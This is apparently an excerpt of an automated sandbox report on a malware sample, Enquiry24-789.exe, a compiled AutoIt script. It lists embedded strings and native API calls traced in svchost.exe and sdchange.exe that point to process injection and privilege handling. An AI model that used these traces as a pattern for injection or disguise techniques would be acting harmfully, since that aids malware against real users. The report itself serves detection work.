Source: Enquiry24-789.exe String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_35adfbe2-8
Source: initial sample Static PE information: Filename: Enquiry24-789.exe
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042CD0B NtClose, 2_2_0042CD0B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472DF0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_05472DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472C70 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_05472C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472B60 NtClose,LdrInitializeThunk, 2_2_05472B60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054735C0 NtCreateMutant,LdrInitializeThunk, 2_2_054735C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05474650 NtSuspendThread, 2_2_05474650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05474340 NtSetContextThread, 2_2_05474340
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472D00 NtSetInformationFile, 2_2_05472D00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472D10 NtMapViewOfSection, 2_2_05472D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472D30 NtUnmapViewOfSection, 2_2_05472D30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472DD0 NtDelayExecution, 2_2_05472DD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472DB0 NtEnumerateKey, 2_2_05472DB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472C60 NtCreateKey, 2_2_05472C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472C00 NtQueryInformationProcess, 2_2_05472C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472CC0 NtQueryVirtualMemory, 2_2_05472CC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472CF0 NtOpenProcess, 2_2_05472CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472CA0 NtQueryInformationToken, 2_2_05472CA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472F60 NtCreateProcessEx, 2_2_05472F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472F30 NtCreateSection, 2_2_05472F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472FE0 NtCreateFile, 2_2_05472FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472F90 NtProtectVirtualMemory, 2_2_05472F90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472FA0 NtQuerySection, 2_2_05472FA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472FB0 NtResumeThread, 2_2_05472FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472E30 NtWriteVirtualMemory, 2_2_05472E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472EE0 NtQueueApcThread, 2_2_05472EE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472E80 NtReadVirtualMemory, 2_2_05472E80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472EA0 NtAdjustPrivilegesToken, 2_2_05472EA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472BE0 NtQueryValueKey, 2_2_05472BE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472BF0 NtAllocateVirtualMemory, 2_2_05472BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472B80 NtQueryInformationFile, 2_2_05472B80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472BA0 NtEnumerateValueKey, 2_2_05472BA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472AD0 NtReadFile, 2_2_05472AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472AF0 NtWriteFile, 2_2_05472AF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472AB0 NtWaitForSingleObject, 2_2_05472AB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05473010 NtOpenDirectoryObject, 2_2_05473010
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05473090 NtSetValueKey, 2_2_05473090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05473D70 NtOpenThread, 2_2_05473D70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05473D10 NtOpenProcessToken, 2_2_05473D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054739B0 NtGetContextThread, 2_2_054739B0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B4650 NtSuspendThread,LdrInitializeThunk, 5_2_046B4650
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B4340 NtSetContextThread,LdrInitializeThunk, 5_2_046B4340
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2C60 NtCreateKey,LdrInitializeThunk, 5_2_046B2C60
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2C70 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_046B2C70
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2CA0 NtQueryInformationToken,LdrInitializeThunk, 5_2_046B2CA0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2D30 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_046B2D30
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2D10 NtMapViewOfSection,LdrInitializeThunk, 5_2_046B2D10
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2DF0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_046B2DF0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2DD0 NtDelayExecution,LdrInitializeThunk, 5_2_046B2DD0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2EE0 NtQueueApcThread,LdrInitializeThunk, 5_2_046B2EE0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2E80 NtReadVirtualMemory,LdrInitializeThunk, 5_2_046B2E80
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2F30 NtCreateSection,LdrInitializeThunk, 5_2_046B2F30
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2FE0 NtCreateFile,LdrInitializeThunk, 5_2_046B2FE0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2FB0 NtResumeThread,LdrInitializeThunk, 5_2_046B2FB0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2AF0 NtWriteFile,LdrInitializeThunk, 5_2_046B2AF0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2AD0 NtReadFile,LdrInitializeThunk, 5_2_046B2AD0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2B60 NtClose,LdrInitializeThunk, 5_2_046B2B60
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2BE0 NtQueryValueKey,LdrInitializeThunk, 5_2_046B2BE0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_046B2BF0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2BA0 NtEnumerateValueKey,LdrInitializeThunk, 5_2_046B2BA0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B35C0 NtCreateMutant,LdrInitializeThunk, 5_2_046B35C0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B39B0 NtGetContextThread,LdrInitializeThunk, 5_2_046B39B0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2C00 NtQueryInformationProcess, 5_2_046B2C00
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2CF0 NtOpenProcess, 5_2_046B2CF0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2CC0 NtQueryVirtualMemory, 5_2_046B2CC0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2D00 NtSetInformationFile, 5_2_046B2D00
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2DB0 NtEnumerateKey, 5_2_046B2DB0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2E30 NtWriteVirtualMemory, 5_2_046B2E30
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2EA0 NtAdjustPrivilegesToken, 5_2_046B2EA0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2F60 NtCreateProcessEx, 5_2_046B2F60
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2FA0 NtQuerySection, 5_2_046B2FA0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2F90 NtProtectVirtualMemory, 5_2_046B2F90
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2AB0 NtWaitForSingleObject, 5_2_046B2AB0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2B80 NtQueryInformationFile, 5_2_046B2B80
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B3010 NtOpenDirectoryObject, 5_2_046B3010
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B3090 NtSetValueKey, 5_2_046B3090
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B3D70 NtOpenThread, 5_2_046B3D70
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B3D10 NtOpenProcessToken, 5_2_046B3D10
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_02568EC0 NtCreateFile, 5_2_02568EC0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_02569340 NtAllocateVirtualMemory, 5_2_02569340
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_02569030 NtReadFile, 5_2_02569030
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_02569130 NtDeleteFile, 5_2_02569130
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_025691E0 NtClose, 5_2_025691E0
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C3D5EB: CreateFileW,DeviceIoControl,CloseHandle, 0_2_00C3D5EB
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C31201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00C31201
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C3E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_00C3E8F6
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C42046 0_2_00C42046
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BD8060 0_2_00BD8060
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C38298 0_2_00C38298
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C0E4FF 0_2_00C0E4FF
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C0676B 0_2_00C0676B
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C64873 0_2_00C64873
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BFCAA0 0_2_00BFCAA0
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BDCAF0 0_2_00BDCAF0
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BECC39 0_2_00BECC39
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C06DD9 0_2_00C06DD9
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BD91C0 0_2_00BD91C0
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BEB119 0_2_00BEB119
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF1394 0_2_00BF1394
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF1706 0_2_00BF1706
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF781B 0_2_00BF781B
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF19B0 0_2_00BF19B0
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BD7920 0_2_00BD7920
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BE997D 0_2_00BE997D
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF7A4A 0_2_00BF7A4A
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF7CA7 0_2_00BF7CA7
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF1C77 0_2_00BF1C77
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C09EEE 0_2_00C09EEE
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C5BE44 0_2_00C5BE44
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF1F32 0_2_00BF1F32
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_02383630 0_2_02383630
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418C9B 2_2_00418C9B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040E859 2_2_0040E859
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040E85B 2_2_0040E85B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401000 2_2_00401000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004038C8 2_2_004038C8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042F32B 2_2_0042F32B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004033D8 2_2_004033D8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401560 2_2_00401560
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004105B3 2_2_004105B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004105BB 2_2_004105BB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00416E7B 2_2_00416E7B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00416E06 2_2_00416E06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402F68 2_2_00402F68
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004107DB 2_2_004107DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440535 2_2_05440535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05500591 2_2_05500591
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F2446 2_2_054F2446
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E4420 2_2_054E4420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054EE4F6 2_2_054EE4F6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05464750 2_2_05464750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440770 2_2_05440770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543C7C0 2_2_0543C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545C6E0 2_2_0545C6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C8158 2_2_054C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05430100 2_2_05430100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DA118 2_2_054DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F81CC 2_2_054F81CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F41A2 2_2_054F41A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_055001AA 2_2_055001AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D2000 2_2_054D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FA352 2_2_054FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544E3F0 2_2_0544E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_055003E6 2_2_055003E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C02C0 2_2_054C02C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544AD00 2_2_0544AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DCD1F 2_2_054DCD1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543ADE0 2_2_0543ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05458DBF 2_2_05458DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440C00 2_2_05440C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05430CF2 2_2_05430CF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B4F40 2_2_054B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05482F28 2_2_05482F28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05460F30 2_2_05460F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E2F30 2_2_054E2F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05432FC8 2_2_05432FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544CFE0 2_2_0544CFE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054BEFA0 2_2_054BEFA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440E59 2_2_05440E59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FEE26 2_2_054FEE26
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FEEDB 2_2_054FEEDB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05452E90 2_2_05452E90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FCE93 2_2_054FCE93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05456962 2_2_05456962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054429A0 2_2_054429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0550A9A6 2_2_0550A9A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544A840 2_2_0544A840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05442840 2_2_05442840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546E8F0 2_2_0546E8F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054268B8 2_2_054268B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FAB40 2_2_054FAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F6BD7 2_2_054F6BD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543EA80 2_2_0543EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F7571 2_2_054F7571
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_055095C3 2_2_055095C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DD5B0 2_2_054DD5B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05431460 2_2_05431460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FF43F 2_2_054FF43F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FF7B0 2_2_054FF7B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05485630 2_2_05485630
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F16CC 2_2_054F16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0547516C 2_2_0547516C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542F172 2_2_0542F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0550B16B 2_2_0550B16B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544B1B0 2_2_0544B1B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054EF0CC 2_2_054EF0CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054470C0 2_2_054470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F70E9 2_2_054F70E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FF0E0 2_2_054FF0E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542D34C 2_2_0542D34C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F132D 2_2_054F132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0548739A 2_2_0548739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545B2C0 2_2_0545B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E12ED 2_2_054E12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054452A0 2_2_054452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05443D40 2_2_05443D40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F1D5A 2_2_054F1D5A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F7D73 2_2_054F7D73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545FDC0 2_2_0545FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B9C32 2_2_054B9C32
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FFCF2 2_2_054FFCF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FFF09 2_2_054FFF09
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05403FD2 2_2_05403FD2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05403FD5 2_2_05403FD5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05441F92 2_2_05441F92
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FFFB1 2_2_054FFFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05449EB0 2_2_05449EB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05449950 2_2_05449950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545B950 2_2_0545B950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D5910 2_2_054D5910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054AD800 2_2_054AD800
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054438E0 2_2_054438E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FFB76 2_2_054FFB76
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B5BF0 2_2_054B5BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0547DBF9 2_2_0547DBF9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545FB80 2_2_0545FB80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FFA49 2_2_054FFA49
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F7A46 2_2_054F7A46
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B3A6C 2_2_054B3A6C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054EDAC6 2_2_054EDAC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DDAAC 2_2_054DDAAC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05485AA0 2_2_05485AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E1AA3 2_2_054E1AA3
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04732446 5_2_04732446
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04724420 5_2_04724420
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0472E4F6 5_2_0472E4F6
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04680535 5_2_04680535
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04740591 5_2_04740591
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0469C6E0 5_2_0469C6E0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04680770 5_2_04680770
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046A4750 5_2_046A4750
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0467C7C0 5_2_0467C7C0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04712000 5_2_04712000
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04708158 5_2_04708158
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04670100 5_2_04670100
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0471A118 5_2_0471A118
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_047381CC 5_2_047381CC
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_047341A2 5_2_047341A2
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_047401AA 5_2_047401AA
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04720274 5_2_04720274
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0468820D 5_2_0468820D
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_047002C0 5_2_047002C0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473A352 5_2_0473A352
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_047403E6 5_2_047403E6
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0468E3F0 5_2_0468E3F0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04680C00 5_2_04680C00
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04670CF2 5_2_04670CF2
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04720CB5 5_2_04720CB5
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0468AD00 5_2_0468AD00
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0471CD1F 5_2_0471CD1F
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0467ADE0 5_2_0467ADE0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04698DBF 5_2_04698DBF
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04680E59 5_2_04680E59
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473EE26 5_2_0473EE26
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473EEDB 5_2_0473EEDB
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473CE93 5_2_0473CE93
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04692E90 5_2_04692E90
